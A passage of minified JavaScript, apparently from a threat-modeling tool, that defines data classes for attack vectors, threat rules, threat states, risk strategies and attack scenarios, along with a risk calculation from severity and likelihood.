this.Data.threatCategorieIDs.forEach(e=>a.push(this.config.GetThreatCategory(e))),a}AddThreatCategory(a){this.ThreatCategories.includes(a)||this.Data.threatCategorieIDs.push(a.ID)}RemoveThreatCategory(a){this.ThreatCategories.includes(a)&&this.Data.threatCategorieIDs.splice(this.Data.threatCategorieIDs.indexOf(a.ID),1)}FindReferences(a,e){let i=[];return this.ThreatCategories.forEach(n=>i.push({Type:li.DeleteThreatCategory,Param:n})),i}OnDelete(a,e){this.FindReferences(a,e).forEach(n=>{n.Type==li.DeleteThreatCategory&&e.DeleteThreatCategory(n.Param)})}static FromJSON(a,e){return new Zb(a,e)}}var cr=(()=>{return(t=cr||(cr={})).Concept="C",t.Implementation="I",t.Production="P",t.Distribution="D",t.Setup="S",t.Operation="O",t.Update="U",t.Maintenance="M",t.EndOfLife="E",cr;var t})();class y2{static GetKeys(){return[cr.Concept,cr.Implementation,cr.Production,cr.Distribution,cr.Setup,cr.Operation,cr.Update,cr.Maintenance,cr.EndOfLife]}static GetMitigationKeys(){return[cr.Concept,cr.Implementation,cr.Production,cr.Operation,cr.Update,cr.Maintenance]}static ToString(a){switch(a){case cr.Concept:return"lifecycle.Concept";case cr.Implementation:return"lifecycle.Implementation";case cr.Production:return"lifecycle.Production";case cr.Distribution:return"lifecycle.Distribution";case cr.Setup:return"lifecycle.Setup";case cr.Operation:return"lifecycle.Operation";case cr.Update:return"lifecycle.Update";case cr.Maintenance:return"lifecycle.Maintenance";case cr.EndOfLife:return"lifecycle.EndOfLife";default:return console.error("Missing Life Cycle in LifeCycleUtil.ToString()"),"Undefined"}}}var Nm=(()=>{return(t=Nm||(Nm={}))[t.Weakness=1]="Weakness",t[t.AttackTechnique=2]="AttackTechnique",Nm;var t})();class eM{static GetTypes(){return[Nm.Weakness,Nm.AttackTechnique]}static GetTypeNames(){let a=[];return eM.GetTypes().forEach(e=>a.push(eM.ToString(e))),a}static ToString(a){switch(a){case Nm.Weakness:return"general.Weakness";case Nm.AttackTechnique:return"general.AttackTechnique";default:return console.error("Missing Option Type in AttackVectorTypes.ToString()"),"Undefined"}}}var cn=(()=>{return(t=cn||(cn={}))[t.None=0]="None",t[t.Low=1]="Low",t[t.Medium=2]="Medium",t[t.High=3]="High",t[t.Critical=4]="Critical",cn;var t})();class vn{static GetTypes(){return[cn.None,cn.Low,cn.Medium,cn.High,cn.Critical]}static GetTypesDashboard(){return[cn.Low,cn.Medium,cn.High,cn.Critical]}static ToString(a){switch(a){case cn.None:return"properties.threatseverity.None";case cn.Low:return"properties.threatseverity.Low";case cn.Medium:return"properties.threatseverity.Medium";case cn.High:return"properties.threatseverity.High";case cn.Critical:return"properties.threatseverity.Critical"}}}class Wp extends Ln{constructor(a,e){super(a),this.config=e,this.OriginTypes||(this.OriginTypes=[]),this.ThreatIntroduced||(this.Data.ThreatIntroduced=[]),this.ThreatExploited||(this.Data.ThreatExploited=[]),this.Data.threatCategorieIDs||(this.Data.threatCategorieIDs=[]),this.AttackTechnique&&!this.AttackTechnique.CVSS&&(this.AttackTechnique.CVSS={})}get ThreatIntroduced(){return this.Data.ThreatIntroduced}get ThreatExploited(){return this.Data.ThreatExploited}get Adversaries(){return this.Data.Adversaries}set Adversaries(a){this.Data.Adversaries=a}get OriginTypes(){return this.Data.OriginTypes}set OriginTypes(a){this.Data.OriginTypes=a,a.includes(Nm.Weakness)&&!this.Weakness&&(this.Weakness={}),a.includes(Nm.AttackTechnique)&&!this.AttackTechnique&&(this.AttackTechnique={CVSS:{}})}get ThreatCategories(){let a=[];return this.Data.threatCategorieIDs.forEach(e=>a.push(this.config.GetThreatCategory(e))),a}set ThreatCategories(a){this.Data.threatCategorieIDs=null==a?void 0:a.map(e=>e.ID)}get Weakness(){return this.Data.Weakness}set Weakness(a){this.Data.Weakness=a}get AttackTechnique(){return this.Data.AttackTechnique}set AttackTechnique(a){this.Data.AttackTechnique=a}get Severity(){return this.Data.Severity}set Severity(a){this.Data.Severity=a}FindReferences(a,e){let i=[];return e.GetThreatRules().filter(n=>{var r;return(null===(r=n.AttackVector)||void 0===r?void 0:r.ID)==this.ID}).forEach(n=>{i.push({Type:li.DeleteThreatRule,Param:n})}),e.GetControls().filter(n=>n.MitigatedAttackVectors.some(r=>r.ID==this.ID)).forEach(n=>{i.push({Type:li.RemoveAttackVectorFromControl,Param:n})}),null==a||a.GetAttackScenarios().filter(n=>{var r;return(null===(r=n.AttackVector)||void 0===r?void 0:r.ID)==this.ID}).forEach(n=>{i.push({Type:li.DeleteAttackScenario,Param:n})}),i}OnDelete(a,e){let i=this.FindReferences(a,e),n=e.FindGroupOfAttackVector(this);n&&n.RemoveAttackVector(this),i.forEach(r=>{r.Type==li.DeleteThreatRule?e.DeleteThreatRule(r.Param):r.Type==li.RemoveAttackVectorFromControl?r.Param.MitigatedAttackVectors=r.Param.MitigatedAttackVectors.filter(c=>c.ID!=this.ID):r.Type==li.DeleteAttackScenario&&a.DeleteAttackScenario(r.Param)})}static FromJSON(a,e){return new Wp(a,e)}}class tM extends Ln{constructor(a,e){super(a),this.config=e,this.Data.attackVectorGroupIDs||(this.Data.attackVectorGroupIDs=[]),this.Data.attackVectorIDs||(this.Data.attackVectorIDs=[])}get SubGroups(){let a=[];return this.Data.attackVectorGroupIDs.forEach(e=>a.push(this.config.GetAttackVectorGroup(e))),a}get AttackVectors(){let a=[];return this.Data.attackVectorIDs.forEach(e=>a.push(this.config.GetAttackVector(e))),a}AddAttackVectorGroup(a){this.SubGroups.includes(a)||this.Data.attackVectorGroupIDs.push(a.ID)}RemoveAttackVectorGroup(a){this.SubGroups.includes(a)&&this.Data.attackVectorGroupIDs.splice(this.Data.attackVectorGroupIDs.indexOf(a.ID),1)}AddAttackVector(a){this.AttackVectors.includes(a)||this.Data.attackVectorIDs.push(a.ID)}RemoveAttackVector(a){this.AttackVectors.includes(a)&&this.Data.attackVectorIDs.splice(this.Data.attackVectorIDs.indexOf(a.ID),1)}FindReferences(a,e){let i=[];return this.SubGroups.forEach(n=>i.push({Type:li.DeleteAttackVectorGroup,Param:n})),this.AttackVectors.forEach(n=>i.push({Type:li.DeleteAttackVector,Param:n})),i}OnDelete(a,e){let i=this.FindReferences(a,e),n=e.FindGroupOfAttackVectorGroup(this);n&&n.RemoveAttackVectorGroup(this),i.forEach(r=>{r.Type==li.DeleteAttackVector?e.DeleteAttackVector(r.Param):r.Type==li.DeleteAttackVectorGroup&&e.DeleteAttackVectorGroup(r.Param)})}static FromJSON(a,e){return new tM(a,e)}}var Fp=(()=>{return(t=Fp||(Fp={}))[t.YesNo=1]="YesNo",Fp;var t})();class Pl{static GetOptions(a){return a===Fp.YesNo?[{Key:"general.Yes",Value:!0},{Key:"general.No",Value:!1},{Key:"general.N/A",Value:"undefined"}]:(console.error("Missing Option Type in OptionTypeUtil.GetOptions()",a),null)}static GetTypes(){return[Fp.YesNo]}static GetTypeNames(){let a=[];return Pl.GetTypes().forEach(e=>a.push(Pl.ToString(e))),a}static ToString(a){return a===Fp.YesNo?"optiontype.yesno":(console.error("Missing Option Type in OptionTypeUtil.ToString()"),"Undefined")}}class iM extends Ln{constructor(a,e){super(a),this.config=e,this.ChangesPerOption||(this.Data.ChangesPerOption={}),this.OptionType||(this.OptionType=Fp.YesNo)}get Question(){return this.Data.Question}set Question(a){this.Data.Question=a}get ComponentType(){return this.config.GetMyComponentType(this.Data.componentTypeID)}set ComponentType(a){this.Data.componentTypeID=a.ID}get OptionType(){return this.Data.OptionType}set OptionType(a){this.Data.OptionType=a}get Property(){return this.ComponentType.Properties.find(a=>a.ID==this.Data.propertyID)}set Property(a){this.Data.propertyID=null==a?void 0:a.ID,a&&this.OptionType==Fp.YesNo&&Pl.GetOptions(this.OptionType).forEach(e=>{this.ChangesPerOption[e.Key]={},this.ChangesPerOption[e.Key].Active=null!=e.Value,this.ChangesPerOption[e.Key].Value=e.Value})}get ChangesPerOption(){return this.Data.ChangesPerOption}FindReferences(a,e){let i=[];return null==a||a.GetAttackScenarios().filter(n=>{var r;return(null===(r=n.ThreatQuestion)||void 0===r?void 0:r.ID)==this.ID}).forEach(n=>{i.push({Type:li.DeleteAttackScenario,Param:n})}),null==a||a.GetComponents().filter(n=>Object.keys(n.ThreatQuestions).includes(this.ID)).forEach(n=>{i.push({Type:li.RemoveThreatQuestionFromComponent,Param:n})}),i}OnDelete(a,e){this.FindReferences(a,e).forEach(n=>{n.Type==li.DeleteAttackScenario?a.DeleteAttackScenario(n.Param):n.Type==li.RemoveThreatQuestionFromComponent&&n.Param.RemoveThreatQuestion(this)})}static FromJSON(a,e){return new iM(a,e)}}var on=(()=>{return(t=on||(on={}))[t.Stencil=1]="Stencil",t[t.DFD=2]="DFD",t[t.Component=3]="Component",t[t.Protocol=4]="Protocol",on;var t})(),nl=(()=>{return(t=nl||(nl={}))[t.EachElement=1]="EachElement",t[t.OnceForAllElements=2]="OnceForAllElements",t[t.OnceForEachElement=3]="OnceForEachElement",nl;var t})();class vG{static GetTypes(){return[nl.EachElement,nl.OnceForAllElements,nl.OnceForEachElement]}static ToString(a){switch(a){case nl.EachElement:return"properties.eachElement";case nl.OnceForAllElements:return"properties.onceForAllElements";case nl.OnceForEachElement:return"properties.onceForEachElement";default:return console.error("Missing Rule Generation Type in RuleGenerationTypes.ToString()"),"Undefined"}}}var ya=(()=>{return(t=ya||(ya={}))[t.Property=1]="Property",t[t.DataFlowCrosses=2]="DataFlowCrosses",t[t.PhysicalElement=3]="PhysicalElement",t[t.SenderInterface=10]="SenderInterface",t[t.ReceiverInterface=11]="ReceiverInterface",ya;var t})(),cc=(()=>{return(t=cc||(cc={})).Equals="==",t.EqualsNot="!=",t.GreaterThan=">",t.LessThan="<",t.GreaterThanOrEquals=">=",t.LessThanOrEquals="<=",cc;var t})();class Vg{static ToString(a,e,i){return a.RuleType==on.DFD?Vg.DFDToString(a.DFDRestriction,e,i):a.RuleType==on.Stencil?Vg.StencilToString(a.StencilRestriction,e,i):a.RuleType==on.Component?Vg.ComponentToString(a.ComponentRestriction,e,i):a.RuleType==on.Protocol?Vg.ProtocolToString(a.ProtocolRestriction,e,i):void 0}static StencilToString(a,e,i){let n="",r=k=>"{"+k+"}",c=k=>" "+k+" ",d=e.Config.GetStencilType(a.stencilTypeID),T=0;for(let k=0;k<a.DetailRestrictions.length;k++){let q=a.DetailRestrictions[k],Y=q.Layer>T;for(Y&&0!=k&&(n+=a.DetailRestrictions[k-1].IsOR?" OR ":" AND ");q.Layer>T;)n+="(",T++;for(;q.Layer<T;)n+=")",T--;if(Y||0!=k&&(n+=a.DetailRestrictions[k-1].IsOR?" OR ":" AND "),n+=r(d.Name),q.RestType==ya.Property){let te=e.Config.GetAllStencilProperties(d).find(pe=>pe.ID==q.PropertyRest.ID);n+="."+r(te&&te.DisplayName?te.DisplayName:q.PropertyRest.ID),n+=c(q.PropertyRest.ComparisonType),n+=r(te&&te.Type==Ii.LowMediumHighSelect?i.instant(An.ToString(q.PropertyRest.Value)):String(q.PropertyRest.Value))}else if(q.RestType==ya.DataFlowCrosses)n+=" crosses "+r(q.DataflowRest.TrustAreaIDs.map(te=>e.Config.GetStencilType(te)).map(te=>te.Name).join(" "+i.instant("general.or")+" "));else if(q.RestType==ya.PhysicalElement){let te=Sc.GetPhyiscalID(d.ElementTypeID),Re=e.Config.GetStencilTypes().find(Fe=>Fe.IsDefault&&Fe.ElementTypeID==te).Properties.find(Fe=>Fe.ID==q.PhyElementRest.Property.ID);n+="."+r(i.instant("properties.PhysicalElement"))+"."+r(Re&&Re.DisplayName?Re.DisplayName:q.PhyElementRest.Property.ID),n+=c(q.PhyElementRest.Property.ComparisonType.toString()),n+=r(Re&&Re.Type==Ii.LowMediumHighSelect?i.instant(An.ToString(q.PhyElementRest.Property.Value)):String(q.PhyElementRest.Property.Value))}}for(;T>0;)n+=")",T--;return n}static ComponentToString(a,e,i){let n="",r=k=>"{"+k+"}",c=k=>" "+k+" ",d=e.Config.GetMyComponentType(a.componentTypeID),T=0;for(let k=0;k<a.DetailRestrictions.length;k++){let q=a.DetailRestrictions[k],Y=q.Layer>T;for(Y&&0!=k&&(n+=a.DetailRestrictions[k-1].IsOR?" OR ":" AND ");q.Layer>T;)n+="(",T++;for(;q.Layer<T;)n+=")",T--;if(Y||0!=k&&(n+=a.DetailRestrictions[k-1].IsOR?" OR ":" AND "),n+=r(d.Name),q.RestType==ya.Property){let te=d.Properties.find(pe=>pe.ID==q.PropertyRest.ID);n+="."+r(te&&te.DisplayName?te.DisplayName:q.PropertyRest.ID),n+=c(q.PropertyRest.ComparisonType),n+=r(te&&te.Type==Ii.LowMediumHighSelect?i.instant(An.ToString(q.PropertyRest.Value)):String(q.PropertyRest.Value))}}for(;T>0;)n+=")",T--;return n}static ProtocolToString(a,e,i){let n="",r=k=>"{"+k+"}",c=k=>" "+k+" ",d=e.Config.GetProtocol(a.protocolID),T=0;for(let k=0;k<a.DetailRestrictions.length;k++){let q=a.DetailRestrictions[k],Y=q.Layer>T;for(Y&&0!=k&&(n+=a.DetailRestrictions[k-1].IsOR?" OR ":" AND ");q.Layer>T;)n+="(",T++;for(;q.Layer<T;)n+=")",T--;if(Y||0!=k&&(n+=a.DetailRestrictions[k-1].IsOR?" OR ":" AND "),n+=r(d.Name),q.RestType==ya.Property){let te=d.Properties.find(pe=>pe.ID==q.PropertyRest.ID);n+="."+r(te&&te.DisplayName?te.DisplayName:q.PropertyRest.ID),n+=c(q.PropertyRest.ComparisonType),n+=r(te&&te.Type==Ii.LowMediumHighSelect?i.instant(An.ToString(q.PropertyRest.Value)):String(q.PropertyRest.Value))}}for(;T>0;)n+=")",T--;return n}static DFDToString(a,e,i){var n,r;let c="";const d=Y=>"{"+Y+"}",T=Y=>" "+Y+" ",k=(Y,te)=>-1==Y?"Data Flow":0==Y?i.instant("properties.Sender"):Y==te-1?i.instant("properties.Receiver"):"Node"+(Y-1).toString();let q=0;for(let Y=0;Y<a.NodeRestrictions.length;Y++){let te=a.NodeRestrictions[Y],pe=te.Layer>q;for(pe&&0!=Y&&(c+=a.NodeRestrictions[Y-1].IsOR?" OR ":" AND ");te.Layer>q;)c+="(",q++;for(;te.Layer<q;)c+=")",q--;if(pe||0!=Y&&(c+=a.NodeRestrictions[Y-1].IsOR?" OR ":" AND "),c+=d(k(te.NodeNumber,a.NodeTypes.length)),te.RestType==ya.Property){let Re=null;-1==te.NodeNumber?Re=e.Config.GetStencilTypes().find(Fe=>Fe.IsDefault&&Fe.ElementTypeID==Et.DataFlow).Properties.find(Fe=>Fe.ID==te.PropertyRest.ID):null===(n=a.NodeTypes[te.NodeNumber])||void 0===n||n.TypeIDs.forEach(Fe=>{Re||(Re=e.Config.GetStencilType(Fe).Properties.find(Ne=>Ne.ID==te.PropertyRest.ID))}),c+="."+d(Re&&Re.DisplayName?Re.DisplayName:te.PropertyRest.ID),c+=T(te.PropertyRest.ComparisonType),c+=d(Re&&Re.Type==Ii.LowMediumHighSelect?i.instant(An.ToString(te.PropertyRest.Value)):String(te.PropertyRest.Value))}else if(te.RestType==ya.DataFlowCrosses)c+=" crosses "+d(te.DataflowRest.TrustAreaIDs.map(Re=>e.Config.GetStencilType(Re)).map(Re=>Re.Name).join(" "+i.instant("general.or")+" "));else if(te.RestType==ya.PhysicalElement){let Re=null;null===(r=a.NodeTypes[te.NodeNumber])||void 0===r||r.TypeIDs.forEach(Fe=>{if(!Re){let Ne=Sc.GetPhyiscalID(e.Config.GetStencilType(Fe).ElementTypeID);Ne&&(Re=e.Config.GetStencilTypes().find(ut=>ut.IsDefault&&ut.ElementTypeID==Ne).Properties.find(ut=>ut.ID==te.PhyElementRest.Property.ID))}}),c+="."+d(i.instant("properties.PhysicalElement"))+"."+d(te.PhyElementRest.Property.ID),c+=d(Re&&Re.Type==Ii.LowMediumHighSelect?i.instant(An.ToString(te.PhyElementRest.Property.Value)):String(te.PhyElementRest.Property.Value))}else if(te.RestType==ya.SenderInterface){c+="."+d(i.instant("properties.SenderInterface"));const Re=e.Config.GetStencilTypes().find(Fe=>Fe.IsDefault&&Fe.ElementTypeID==Et.Interface).Properties.find(Fe=>Fe.ID==te.SenderInterfaceRestriction.Property.ID);c+="."+d(Re&&Re.DisplayName?Re.DisplayName:te.SenderInterfaceRestriction.Property.ID),c+=T(te.PropertyRest.ComparisonType),c+=d(Re&&Re.Type==Ii.LowMediumHighSelect?i.instant(An.ToString(te.SenderInterfaceRestriction.Property.Value)):String(te.SenderInterfaceRestriction.Property.Value))}else if(te.RestType==ya.ReceiverInterface){c+="."+d(i.instant("properties.ReceiverInterface"));const Re=e.Config.GetStencilTypes().find(Fe=>Fe.IsDefault&&Fe.ElementTypeID==Et.Interface).Properties.find(Fe=>Fe.ID==te.ReceiverInterfaceRestriction.Property.ID);c+="."+d(Re&&Re.DisplayName?Re.DisplayName:te.ReceiverInterfaceRestriction.Property.ID),c+=T(te.PropertyRest.ComparisonType),c+=d(Re&&Re.Type==Ii.LowMediumHighSelect?i.instant(An.ToString(te.ReceiverInterfaceRestriction.Property.Value)):String(te.ReceiverInterfaceRestriction.Property.Value))}}for(;q>0;)c+=")",q--;return c}}class Vp extends Ln{constructor(a,e){super(a),this.config=e,null==this.Data.IsActive&&(this.Data.IsActive=!0),null==this.Data.RuleGenerationType&&(this.Data.RuleGenerationType=nl.EachElement),this.Data.Mapping||(this.Data.Mapping={}),this.Data.overridenRuleIDs||(this.Data.overridenRuleIDs=[])}get IsActive(){return this.Data.IsActive}set IsActive(a){this.Data.IsActive=a}get RuleType(){return this.Data.RuleType}set RuleType(a){this.Data.RuleType=a,a==on.Stencil?this.StencilRestriction||(this.StencilRestriction={stencilTypeID:"",DetailRestrictions:[]}):a==on.Component?this.ComponentRestriction||(this.ComponentRestriction={componentTypeID:"",DetailRestrictions:[]}):a==on.DFD?this.Data.DFDRestriction||(this.Data.DFDRestriction={AppliesReverse:!1,Target:-1,NodeTypes:[{TypeIDs:[]},{TypeIDs:[]}],NodeRestrictions:[]}):a!=on.Protocol||this.ProtocolRestriction||(this.ProtocolRestriction={protocolID:"",DetailRestrictions:[]})}get RuleGenerationType(){return this.Data.RuleGenerationType}set RuleGenerationType(a){this.Data.RuleGenerationType=a}get Mapping(){return this.Data.Mapping}set Mapping(a){this.Data.Mapping=a}get AttackVector(){return this.config.GetAttackVector(this.Mapping.AttackVectorID)}set AttackVector(a){this.Mapping.AttackVectorID=null==a?void 0:a.ID,a&&(this.Severity=a.Severity)}get ThreatCategories(){return this.config.GetThreatCategories().filter(a=>{var e;return null===(e=this.Mapping.ThreatCategoryIDs)||void 0===e?void 0:e.includes(a.ID)})}set ThreatCategories(a){this.Mapping.ThreatCategoryIDs=null==a?void 0:a.map(e=>e.ID)}get Severity(){return this.Data.Severity}set Severity(a){this.Data.Severity=a}get StencilRestriction(){return this.Data.StencilRestriction}set StencilRestriction(a){this.Data.StencilRestriction=a}get DFDRestriction(){return this.Data.DFDRestriction}set DFDRestriction(a){this.Data.DFDRestriction=a}get ComponentRestriction(){return this.Data.ComponentRestriction}set ComponentRestriction(a){this.Data.ComponentRestriction=a}get ProtocolRestriction(){return this.Data.ProtocolRestriction}set ProtocolRestriction(a){this.Data.ProtocolRestriction=a}get OverridenRules(){let a=[];return this.Data.overridenRuleIDs.forEach(e=>a.push(this.config.GetThreatRule(e))),a}set OverridenRules(a){this.Data.overridenRuleIDs=null==a?void 0:a.map(e=>e.ID)}FindReferences(a,e){let i=[];return null==a||a.GetAttackScenarios().filter(n=>{var r;return(null===(r=n.ThreatRule)||void 0===r?void 0:r.ID)==this.ID}).forEach(n=>{i.push({Type:li.DeleteAttackScenario,Param:n})}),i}OnDelete(a,e){let i=this.FindReferences(a,e),n=e.FindGroupOfThreatRule(this);n&&n.RemoveThreatRule(this),i.forEach(r=>{r.Type==li.DeleteAttackScenario&&a.DeleteAttackScenario(r.Param)})}static FromJSON(a,e){return new Vp(a,e)}}class aM extends Ln{constructor(a,e){super(a),this.config=e,this.Data.threatRuleGroupIDs||(this.Data.threatRuleGroupIDs=[]),this.Data.threatRuleIDs||(this.Data.threatRuleIDs=[])}get SubGroups(){let a=[];return this.Data.threatRuleGroupIDs.forEach(e=>a.push(this.config.GetThreatRuleGroup(e))),a}get ThreatRules(){let a=[];return this.Data.threatRuleIDs.forEach(e=>a.push(this.config.GetThreatRule(e))),a}get RuleType(){return this.Data.RuleType}set RuleType(a){}AddThreatRuleGroup(a){this.SubGroups.includes(a)||this.Data.threatRuleGroupIDs.push(a.ID)}RemoveThreatRuleGroup(a){this.SubGroups.includes(a)&&this.Data.threatRuleGroupIDs.splice(this.Data.threatRuleGroupIDs.indexOf(a.ID),1)}AddThreatRule(a){this.ThreatRules.includes(a)||this.Data.threatRuleIDs.push(a.ID)}RemoveThreatRule(a){this.ThreatRules.includes(a)&&this.Data.threatRuleIDs.splice(this.Data.threatRuleIDs.indexOf(a.ID),1)}FindReferences(a,e){let i=[];return this.SubGroups.forEach(n=>i.push({Type:li.DeleteThreatRuleGroup,Param:n})),this.ThreatRules.forEach(n=>i.push({Type:li.DeleteThreatRule,Param:n})),i}OnDelete(a,e){let i=this.FindReferences(a,e),n=e.FindGroupOfThreatRuleGroup(this);n&&n.RemoveThreatRuleGroup(this),i.forEach(r=>{r.Type==li.DeleteThreatRule?e.DeleteThreatRule(r.Param):r.Type==li.DeleteThreatRuleGroup&&e.DeleteThreatRuleGroup(r.Param)})}static FromJSON(a,e){return new aM(a,e)}}var zn=(()=>{return(t=zn||(zn={}))[t.New=1]="New",t[t.Stable=2]="Stable",t[t.Removed=3]="Removed",zn;var t})(),_o=(()=>{return(t=_o||(_o={}))[t.NotSet=1]="NotSet",t[t.NotApplicable=2]="NotApplicable",t[t.NeedsInvestigation=3]="NeedsInvestigation",t[t.Verified=4]="Verified",t[t.Proven=5]="Proven",t[t.Duplicate=6]="Duplicate",_o;var t})();class ku{static GetThreatStates(){return[_o.NotSet,_o.NotApplicable,_o.NeedsInvestigation,_o.Verified,_o.Proven,_o.Duplicate]}static ToString(a){switch(a){case _o.NotSet:return"properties.threatstate.NotSet";case _o.NotApplicable:return"properties.threatstate.NotApplicable";case _o.NeedsInvestigation:return"properties.threatstate.NeedsInvestigation";case _o.Verified:return"properties.threatstate.Verified";case _o.Proven:return"properties.threatstate.Proven";case _o.Duplicate:return"properties.threatstate.Duplicate";default:return console.error("Missing State in ThreatStateUtil.ToString()",a),"Undefined"}}}var Lm=(()=>{return(t=Lm||(Lm={}))[t.Avoid=1]="Avoid",t[t.Mitigate=2]="Mitigate",t[t.Transfer=3]="Transfer",t[t.Accept=4]="Accept",Lm;var t})();class fT{static GetKeys(){return[Lm.Avoid,Lm.Mitigate,Lm.Transfer,Lm.Accept]}static ToString(a){switch(a){case Lm.Avoid:return"properties.riskstrategy.Avoid";case Lm.Mitigate:return"properties.riskstrategy.Mitigate";case Lm.Transfer:return"properties.riskstrategy.Transfer";case Lm.Accept:return"properties.riskstrategy.Accept";default:return console.error("Missing State in RiskStrategyUtil.ToString()",a),"Undefined"}}}class Rc extends Ln{constructor(a,e,i){super(a),this.project=e,this.config=i,this.Data.Mapping||(this.Data.Mapping={}),this.Data.targetIDs||(this.Data.targetIDs=[]),this.Data.ThreatState||(this.ThreatState=_o.NotSet),this.Data.systemThreatIDs||(this.Data.systemThreatIDs=[]),this.Data.threatActorIDs||(this.Data.threatActorIDs=[]),this.Data.linkedScenarioIDs||(this.Data.linkedScenarioIDs=[]),this.Data.myTagIDs||(this.Data.myTagIDs=[])}get Name(){if(null!=this.Data.Name)return this.Data.Name;let a="";return this.ThreatRule?a+=this.ThreatRule.Name+" on ":this.AttackVector&&(a+=this.AttackVector.GetProperty("Name")+" on "),this.Target?a+=this.Target.GetProperty("Name"):this.Targets&&(a+=this.Targets.map(e=>e.GetProperty("Name")).join(", ")),a}set Name(a){this.Data.Name=a,this.NameChanged.emit(this.Name)}get Number(){return this.Data.Number}set Number(a){this.Data.Number=a&&String(a)}get ViewID(){return this.Data.ViewID}set ViewID(a){this.Data.ViewID=a}get MappingState(){return this.Data.MappingState}set MappingState(a){this.Data.MappingState=a}get ThreatState(){return this.Data.ThreatState}set ThreatState(a){this.Data.ThreatState=Number(a),[_o.NotApplicable,_o.Duplicate].includes(Number(a))&&this.GetCountermeasures().forEach(e=>{(1==e.AttackScenarios.length||e.AttackScenarios.every(i=>[_o.NotApplicable,_o.Duplicate].includes(i.ThreatState)||i==this))&&(e.MitigationState=Number(a)==_o.Duplicate?Ra.Duplicate:Ra.NotApplicable)})}get IsGenerated(){return this.Data.IsGenerated}set IsGenerated(a){this.Data.IsGenerated=a}get ScoreCVSS(){return this.Data.ScoreCVSS}set ScoreCVSS(a){this.Data.ScoreCVSS=a}get ScoreOwaspRR(){return this.Data.ScoreOwaspRR}set ScoreOwaspRR(a){this.Data.ScoreOwaspRR=a}get Severity(){return this.Data.Severity}set Severity(a){this.Data.Severity=+a}get SeverityReason(){return this.Data.SeverityReason}set SeverityReason(a){this.Data.SeverityReason=a}get Likelihood(){return this.Data.Likelihood}set Likelihood(a){this.Data.Likelihood=+a}get LikelihoodReason(){return this.Data.LikelihoodReason}set LikelihoodReason(a){this.Data.LikelihoodReason=a}get Risk(){return this.Data.Risk}set Risk(a){this.Data.Risk=+a}get RiskReason(){return this.Data.RiskReason}set RiskReason(a){this.Data.RiskReason=a}get RiskStrategy(){return this.Data.RiskStrategy}set RiskStrategy(a){this.Data.RiskStrategy=+a}get RiskStrategyReason(){return this.Data.RiskStrategyReason}set RiskStrategyReason(a){this.Data.RiskStrategyReason=a}get Target(){let a=this.project.GetDFDElement(this.Data.targetID);return a||(a=this.project.GetComponent(this.Data.targetID)),a||(a=this.project.GetContextElement(this.Data.targetID)),a}set Target(a){this.Data.targetID=null==a?void 0:a.ID}get Targets(){let a=[];return this.Data.targetIDs.forEach(e=>{let i=this.project.GetDFDElement(e);if(i)a.push(i);else{let n=this.project.GetComponent(e);if(n)a.push(n);else{let r=this.project.GetContextElement(e);r&&a.push(r)}}}),a}set Targets(a){this.Data.targetIDs=a.map(e=>e.ID)}get Mapping(){return this.Data.Mapping}set Mapping(a){this.Data.Mapping=a}get AttackVector(){var a;return this.config.GetAttackVector(null===(a=this.Mapping.Threat)||void 0===a?void 0:a.AttackVectorID)}set AttackVector(a){this.Mapping.Threat.AttackVectorID=null==a?void 0:a.ID,a&&(this.ThreatCategories=a.ThreatCategories)}get ThreatCategories(){return this.config.GetThreatCategories().filter(a=>{var e;return null===(e=this.Mapping.Threat.ThreatCategoryIDs)||void 0===e?void 0:e.includes(a.ID)})}set ThreatCategories(a){this.Mapping.Threat.ThreatCategoryIDs=a.map(e=>e.ID)}get ThreatQuestion(){return this.config.GetThreatQuestion(this.Mapping.QuestionID)}set ThreatQuestion(a){this.Mapping.QuestionID=a.ID}get ThreatRule(){return this.config.GetThreatRule(this.Mapping.RuleID)}set ThreatRule(a){this.Mapping.RuleID=a.ID}get ThreatMnemonicLetterID(){return this.Mapping.MnemonicID}set ThreatMnemonicLetterID(a){this.Mapping.MnemonicID=a}get CveEntry(){return this.Mapping.CVE}set CveEntry(a){this.Mapping.CVE=a}get RuleStillApplies(){return this.Data.RuleStillApplies}set RuleStillApplies(a){this.Data.RuleStillApplies=a}get SystemThreats(){let a=[];return this.Data.systemThreatIDs.forEach(e=>a.push(this.project.GetSystemThreat(e))),a}set SystemThreats(a){this.Data.systemThreatIDs=null==a?void 0:a.map(e=>e.ID)}get ThreatSources(){let a=[];return this.Data.threatActorIDs.forEach(e=>a.push(this.project.GetThreatActor(e))),a}set ThreatSources(a){this.Data.threatActorIDs=null==a?void 0:a.map(e=>e.ID)}get LinkedScenarios(){let a=[];return this.Data.linkedScenarioIDs.forEach(e=>a.push(this.project.GetAttackScenario(e))),a}set LinkedScenarios(a){this.Data.linkedScenarioIDs=null==a?void 0:a.map(e=>e.ID)}get MyTags(){let a=[];return this.Data.myTagIDs.forEach(e=>a.push(this.project.GetMyTag(e))),a}set MyTags(a){this.Data.myTagIDs=null==a?void 0:a.map(e=>e.ID)}SetMapping(a,e,i,n,r,c,d,T){var k,q;this.MappingState=zn.New,this.Mapping.Threat={AttackVectorID:a,ThreatCategoryIDs:e},r&&(this.ThreatRule=r,this.Description=r.Description,r.Severity?this.Severity=r.Severity:this.AttackVector&&(this.Severity=this.AttackVector.Severity),!(null===(q=null===(k=r.AttackVector)||void 0===k?void 0:k.AttackTechnique)||void 0===q)&&q.CVSS&&(this.ScoreCVSS=JSON.parse(JSON.stringify(r.AttackVector.AttackTechnique.CVSS)))),c&&(this.ThreatQuestion=c,0==this.Description.length&&(this.Description=c.Description)),d&&T?(this.ThreatMnemonicLetterID=T.ID,this.Name=T.Name+" on "+(null==i?void 0:i.GetProperty("Name")),this.Description=T.Description,T.threatCategoryID&&(this.ThreatCategories=[d.GetThreatCategory(T)])):this.Name=null,this.Target=i,this.Targets=n,this.RuleStillApplies=!0}CalculateRisk(){if(null!=this.Severity&&null!=this.Likelihood){const a=this.Likelihood,e=this.Severity;let i=cn.Critical;e==cn.None?i=cn.None:a==lr.High?[cn.High,cn.Medium].includes(e)?i=cn.High:e==cn.Low&&(i=cn.Medium):a==lr.Medium?i=e:a==lr.Low&&(i=cn.Low,[cn.Medium,cn.High].includes(e)?i=cn.Medium:e==cn.Critical&&(i=cn.High)),this.Risk=i}}AddLinkedAttackScenario(a){this.LinkedScenarios.includes(a)||this.Data.linkedScenarioIDs.push(a.ID)}RemoveLinkedAttackScenario(a){const 